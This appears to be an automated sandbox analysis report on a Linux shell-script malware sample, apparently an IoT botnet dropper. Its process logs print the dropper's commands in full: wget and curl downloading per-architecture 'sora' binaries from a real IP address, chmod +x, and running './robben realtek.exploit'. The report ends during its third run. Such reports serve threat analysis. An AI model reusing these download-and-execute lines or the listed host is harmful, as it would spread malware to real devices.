Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-c32akssaqa
Target bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
SHA256 bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1

Threat Level: Shows suspicious behavior

The file bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 02:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:39

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

128s

Command Line

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh N/A

Processes

/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]

/tmp/robben

[./robben realtek.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
N/A 224.0.0.251:5353 udp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
GB 195.181.164.19:443 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:39

Platform

debian9-armhf-20240418-en

Max time kernel

20s

Max time network

22s

Command Line

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh N/A

Processes

/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]

/tmp/robben

[./robben realtek.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

memory/760-1-0xb671b000-0xb672c044-memory.dmp

memory/801-2-0xb66b5000-0xb66c6044-memory.dmp

memory/828-3-0xb6734000-0xb6745044-memory.dmp

memory/828-4-0xb669a000-0xb66ab044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 02:36

Reported

2024-10-18 02:39

Platform

debian9-mipsbe-20240611-en

Max time kernel

83s

Max time network

86s

Command Line

[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
